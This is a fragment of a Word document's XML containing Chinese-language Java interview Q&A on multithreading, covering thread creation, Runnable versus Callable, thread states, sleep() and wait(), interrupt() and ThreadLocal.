          <w:ilvl w:val="0"/>
          <w:numId w:val="1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创建线程的几种方式？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中，创建线程的方式有以下几种：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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继承 Thread 类：创建一个继承自 Thread 类的子类，并重写 run() 方法。然后可以创建该子类的实例并调用 start() 方法来启动新线程。这种方式比较简单，但由于 Java 不支持多继承，因此如果一个类已经继承了其它类，就不能再继承 Thread 类来创建线程。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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实现 Runnable 接口：创建一个实现了 Runnable 接口的类，并实现 run() 方法。然后可以将该类的实例传递给 Thread 类的构造函数，从而创建一个新线程。这种方式可以避免由于继承 Thread 类而导致的单继承限制。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Callable 和 Future 接口：Callable 接口是一种具有类型参数的泛型接口，用于定义一个可以返回值并且可能会抛出异常的任务。可以创建一个实现了 Callable 接口的类，并实现 call() 方法。然后可以将该类的实例传递给 ExecutorService 的 submit() 方法，从而异步执行该任务并获得一个 Future 对象，可以使用该对象来获取异步执行的结果。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Executor 框架：Executor 框架是一种用于管理线程池的框架，可以通过 Executor 接口的实现类来创建一个线程池，并将要执行的任务提交到该线程池中。Executor 框架提供了比直接使用 Thread 类更为灵活的线程管理方式，可以根据实际情况来灵活地配置线程池大小、任务队列等参数。</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总的来说，使用 Runnable 接口和 Executor 框架是创建线程的推荐方式，因为它们可以避免由于继承 Thread 类而导致的单继承限制，同时也更加灵活和易于管理。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Runnable 和 Callable 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Runnable 和 Callable 都是 Java 中用于多线程编程的接口，它们之间的区别主要体现在以下几个方面：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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返回值类型不同：Runnable 的 run() 方法没有返回值，而 Callable 的 call() 方法返回一个泛型参数类型的值。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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抛出异常不同：Runnable 的 run() 方法不能抛出已检查异常，而 Callable 的 call() 方法可以抛出异常。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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用法不同：Runnable 通常用于执行一些简单的任务，而 Callable 通常用于执行一些需要返回结果的任务。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例如，假设需要在多线程环境下计算一个数的平方，可以使用 Runnable 和 Callable 分别实现：</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使用 Runnable 实现</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class SquareTask implements Runnable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private int num;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SquareTask(int num)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this.num = num;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@Override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void run()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int square = num * num;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System.out.println("The square of " + num + " is " + square);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使用 Callable 实现</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class SquareTask implements Callable&lt;Integer&gt;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private int num;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SquareTask(int num)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this.num = num;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@Override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public Integer call() throws Exception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int square = num * num;</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return square;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可以看到，使用 Callable 实现需要指定返回值类型，并在 call() 方法中返回计算结果，而使用 Runnable 实现则直接在 run() 方法中输出计算结果。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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线程状态及转换？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中，线程的状态包括以下几种：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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New：当线程对象创建但是还没有启动时，线程的状态为 New。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Runnable：当线程正在 Java 虚拟机中执行，它的状态就是 Runnable。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Blocked：当线程阻塞于监视器锁时，它的状态为 Blocked。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Waiting：当线程在等待另一个线程通知调度器时，它的状态为 Waiting。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Timed Waiting：当线程在指定的时间内等待另一个线程通知调度器时，它的状态为 Timed Waiting。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Terminated：当线程完成执行或者意外终止时，它的状态为 Terminated。</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线程状态的转换通常是由线程调度器决定的。当线程调用 sleep()、join() 或者在等待 I/O 操作完成时，线程的状态从 Runnable 转换为 Timed Waiting 或者 Waiting 状态。当等待的时间到期或者等待的条件满足时，线程就会从 Timed Waiting 或者 Waiting 状态转换为 Runnable 状态。当线程请求获得一个对象的锁时，如果该锁正在被其他线程持有，线程的状态会从 Runnable 转换为 Blocked 状态。当线程获得了该对象的锁时，线程的状态就会从 Blocked 转换为 Runnable。当线程执行完毕或者发生异常时，线程的状态会从 Runnable 转换为 Terminated。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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sleep() 和 wait()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sleep() 和 wait() 都是线程的控制方法，它们的作用有所不同。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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sleep() 是 Thread 类的静态方法，它会使当前线程暂停指定的时间，让出 CPU 给其它线程。在这个时间内，线程不会释放其持有的锁。线程可以在任何时候调用 sleep() 方法。如果线程被中断，则会抛出 InterruptedException 异常。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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wait() 是 Object 类的实例方法，它会让当前线程进入等待状态，直到其它线程调用 notify() 或 notifyAll() 方法唤醒该线程。在等待过程中，线程会释放其持有的锁。wait() 必须在 synchronized 块中使用。如果线程被中断，则会抛出 InterruptedException 异常。</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因此，sleep() 和 wait() 的区别主要有以下几点：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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使用对象不同：sleep() 是 Thread 类的静态方法，可以在任何地方使用；wait() 是 Object 类的实例方法，必须在 synchronized 块中使用。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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对锁的处理不同：sleep() 不会释放当前线程持有的锁，而 wait() 在等待过程中会释放锁。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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被唤醒的方式不同：sleep() 在指定时间到期后自动唤醒；wait() 必须等待其它线程调用 notify() 或 notifyAll() 方法才能被唤醒。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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应用场景不同：sleep() 通常用于控制线程执行的时间间隔，而 wait() 通常用于多个线程之间的协作，实现线程的等待和唤醒操作。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总之，sleep() 和 wait() 用途不同，需要根据具体的应用场景选择合适的方法来控制线程的执行。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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线程的 run() 和 start() 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中，线程可以通过实现 Runnable 接口或者继承 Thread 类来创建。对于实现 Runnable 接口的线程，需要将其实例传递给一个 Thread 实例，并调用 Thread 实例的 start() 方法来启动线程；而对于继承 Thread 类的线程，则可以直接调用实例的 start() 方法来启动线程。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线程的 start() 方法会启动一个新的线程，并让该线程执行其 run() 方法。在新线程中，run() 方法会被执行，从而完成该线程的操作。因此，run() 方法是线程的执行体，用来定义线程的具体行为。</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start() 方法会在新的线程上启动一个执行流程，而 run() 方法则只是在当前线程上执行一个普通的方法调用。如果直接调用 run() 方法，则并不会启动一个新的线程，而是在当前线程上执行 run() 方法，这样做相当于普通的方法调用，而不是线程的执行。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因此，使用 start() 方法启动线程，是保证多线程并发执行的关键所在。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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在 Java 程序中怎么保证多线程的运行安全？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程序中，可以通过以下几种方式来保证多线程的运行安全：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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同步方法：使用 synchronized 关键字修饰方法，确保同一时间只有一个线程可以进入该方法，从而避免了多线程之间的竞争条件。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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同步代码块：使用 synchronized 关键字修饰代码块，指定需要同步的对象，确保同一时间只有一个线程可以访问该对象。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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使用锁机制：Java 提供了 Lock 接口和 ReentrantLock 类实现锁机制，锁机制可以避免多线程之间的竞争条件，提供更加细粒度的控制，例如可以实现公平锁和非公平锁等。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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使用原子类：Java 提供了一些原子类，例如 AtomicInteger、AtomicBoolean 等，这些类提供了一些基本的原子操作，可以保证在多线程环境下的原子性操作，从而避免了多线程之间的竞争条件。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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使用线程安全的容器：Java 提供了一些线程安全的容器，例如 ConcurrentHashMap、CopyOnWriteArrayList 等，这些容器在实现时考虑到了多线程环境下的并发访问问题，提供了相应的并发访问解决方案，可以保证多线程环境下的运行安全。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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volatile 关键字：使用 volatile 关键字可以保证变量在多线程环境下的可见性，从而避免了由于缓存一致性导致的竞争条件。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以上是一些常见的多线程运行安全保障措施，需要根据实际情况选择合适的方案来保证程序的正确性和稳定性。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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线程同步的几种方法？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中，线程同步的几种方法包括：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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synchronized 方法：在方法前面加上 synchronized 关键字，确保同一时刻只有一个线程执行该方法，从而避免多线程的竞争。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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synchronized 代码块：使用 synchronized 关键字修饰一个代码块，可以保证同一时刻只有一个线程访问该代码块。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Lock 接口：使用 Lock 接口及其实现类，可以实现更加灵活的同步机制。例如，可以使用 ReentrantLock 类来实现可重入锁，或者使用 ReadWriteLock 接口来实现读写锁等。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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volatile 关键字：使用 volatile 关键字可以确保变量的可见性和有序性，从而避免线程间出现数据不一致的情况。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Atomic 类：使用 Atomic 类可以保证基本类型的原子性操作，从而避免多线程竞争的问题。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以上是常见的几种线程同步方法，可以根据具体的需求选择合适的同步方式。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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Thread.interrupt() 方法的工作原理是什么？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Style w:val="8"/>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="32CA99"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="EEFAF7"/>
        </w:rPr>
        <w:t>Thread.interrupt()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> 是一个用于中断线程的方法，它会设置线程的中断状态，并试图中断线程。当线程处于阻塞状态（如等待、睡眠、阻塞IO等）时，调用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="32CA99"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="EEFAF7"/>
        </w:rPr>
        <w:t>interrupt()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> 方法可以使线程抛出 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="32CA99"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="EEFAF7"/>
        </w:rPr>
        <w:t>InterruptedException</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> 异常并从阻塞状态中返回，从而实现中断线程的效果。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具体来说，当 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="32CA99"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="EEFAF7"/>
        </w:rPr>
        <w:t>interrupt()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> 方法被调用时，如果线程处于非阻塞状态，那么只是设置线程的中断状态为 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="32CA99"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="EEFAF7"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">，线程会继续运行。如果线程处于阻塞状态，那么会抛出 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="32CA99"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="EEFAF7"/>
        </w:rPr>
        <w:t>InterruptedException</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> 异常并清除中断状态，从而使线程退出阻塞状态并继续执行。但是，这个过程并不会中断线程的运行，只是通过异常的方式使线程退出阻塞状态，继续运行。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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="32CA99"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="EEFAF7"/>
        </w:rPr>
        <w:t>interrupt()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> 方法并不会立即中断线程的运行，它只是将中断状态设置为 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="32CA99"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="EEFAF7"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。如果线程没有显式检查中断状态并退出运行，那么它仍然会继续执行下去，直到完成自己的任务。因此，在编写多线程程序时，需要在合适的地方检查线程的中断状态并及时退出线程的运行</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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 ThreadLocal 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ThreadLocal 是一个 Java 提供的线程局部变量，它可以为每个线程保存一个独立的变量副本。也就是说，对于不同的线程，ThreadLocal 中的变量可以有不同的值，每个线程都可以访问自己所拥有的变量副本，而不会和其他线程的变量副本产生冲突。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ThreadLocal 可以用来解决多线程并发访问共享变量的问题，例如在使用数据库连接时，为了避免多个线程使用同一个连接造成的线程不安全问题，可以使用 ThreadLocal 来保证每个线程都拥有自己独立的连接。</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ThreadLocal 内部实现是使用一个 ThreadLocalMap 来存储每个线程的变量副本，ThreadLocalMap 的 key 是 ThreadLocal 对象，value 是变量副本。当调用 ThreadLocal 的 get() 方法时，它会首先获取当前线程的 ThreadLocalMap，然后以 ThreadLocal 对象为 key 获取对应的变量副本；当调用 set() 方法时，它会先获取当前线程的 ThreadLocalMap，然后以 ThreadLocal 对象为 key 设置对应的变量副本。</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需要注意的是，使用 ThreadLocal 时要特别小心内存泄漏问题，因为 ThreadLocalMap 中的 Entry 对象会持有 ThreadLocal 对象的弱引用，而 ThreadLocal 对象本身是强引用，如果不及时清理 ThreadLocal 对象，就可能导致内存泄漏。通常情况下，使用完 ThreadLocal 后应该调用 remove() 方法清理当前线程的变量副本，或者使用 try-finally 块来确保清理操作的执行</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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在哪些场景下会使用到 ThreadLocal？</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在多线程编程中，有时候需要在不同的线程中访问同一个对象，并且希望每个线程中访问到的对象是独立的，这时就可以使用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="32CA99"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="EEFAF7"/>
        </w:rPr>
        <w:t>ThreadLocal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w: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下面列举几个常见的使用场景：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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 Web 应用程序中，每个请求都会被一个线程处理。如果需要在不同的方法中共享数据，但是不希望将数据传递给每个方法，则可以使用 ThreadLocal 将数据绑定到当前线程上。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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线程池中的线程是可以被复用的，如果不使用 ThreadLocal 来清理线程本地变量，可能会导致线程重用时出现数据混乱的问题。</w:t>
      </w:r>
    </w:p>
